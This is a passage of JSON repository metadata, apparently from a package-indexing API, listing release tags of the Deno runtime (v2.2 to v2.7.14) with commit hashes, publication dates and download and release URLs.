ts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9